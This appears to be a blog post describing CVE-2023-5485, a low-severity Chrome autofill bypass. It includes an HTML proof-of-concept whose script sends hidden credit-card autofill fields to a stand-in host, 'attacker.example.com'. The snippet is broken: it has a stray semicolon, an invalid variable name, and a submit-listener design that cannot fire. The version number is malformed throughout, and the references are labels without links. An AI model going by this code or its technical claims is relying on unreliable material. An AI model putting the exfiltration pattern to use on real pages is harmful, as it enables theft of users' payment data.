CVE-2023-5485 is a low-severity security vulnerability found in Google Chrome versions prior to 118..5993.70. In particular, it targets the Autofill functionality of the browser, allowing a remote attacker to bypass autofill restrictions through the use of a maliciously crafted HTML page. In this post, we will examine the details of this vulnerability, including the code snippets responsible for the exploit, as well as the original references for the issue.

Exploit Details

The inappropriate implementation issue in the Autofill functionality of Google Chrome affects versions of the browser released prior to 118..5993.70. This vulnerability takes advantage of an oversight in the way Chrome processes and restricts autofill information on web pages, making it possible for an attacker to craft an HTML page that triggers autofill data to be submitted without the user's consent or knowledge.

The issue has been classified by Chromium security as having a "low" severity, indicating that while it may present risks to users' privacy and security, it does not typically lead to more dangerous consequences like remote code execution or more critical system vulnerabilities.

Code Snippet

The exploit can be achieved through a specially crafted HTML page that takes advantage of the weakness in Chrome's Autofill implementation. Here's an example code snippet that demonstrates this vulnerability:

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2023-5485 Exploit</title>
</head>
<body>
  <form id="malicious-form">
    <!-- Normally restricted autofill fields -->
    <input type="text" name="credit-card-number" autocomplete="cc-number" hidden />
    <input type="text" name="credit-card-expiry" autocomplete="cc-exp" hidden />
    <input type="text" name="credit-card-csc" autocomplete="cc-csc" hidden />

    <!-- Triggers autofill without user interaction -->
    <script>
      let maliciousForm = document.getElementById('malicious-form');
      maliciousForm.addEventListener('submit', (event) => {
        event.preventDefault();
        // Send collected autofill data to attacker's server
        fetch('https://attacker.example.com/receive-data';, {
          method: 'POST',
          body: new FormData(malicious-Form)
        });
      });
      maliciousForm.submit();
    </script>
  </form>
</body>
</html>

In this example, the malicious HTML page contains hidden input fields that the browser would normally restrict from being auto-filled, such as credit card numbers, expiration dates, and security codes. When the page is loaded, the JavaScript code listens for the form's submit event, cancels the default submission behavior, and instead sends the autofill data to an attacker-controlled server.

Original References

The vulnerability was first documented in the Chromium project's vulnerability database, which can be found at the following link:

Chromium Vulnerability Database

Additionally, the official patch notes for Google Chrome version 118..5993.70, which addresses this vulnerability, can be found here:

Chrome Patch Notes

Conclusion

CVE-2023-5485 is a low-severity vulnerability affecting Google Chrome Autofill in versions prior to 118..5993.70. Although its risks are relatively minor in comparison to more dangerous vulnerabilities, it highlights the importance of being cautious when using Autofill functionality in any web browser. Users are encouraged to update their browser to the latest version to mitigate the risk of this exploit and maintain good security hygiene.

Timeline

Published on: 10/11/2023 23:15:00 UTC
Last modified on: 10/13/2023 02:15:00 UTC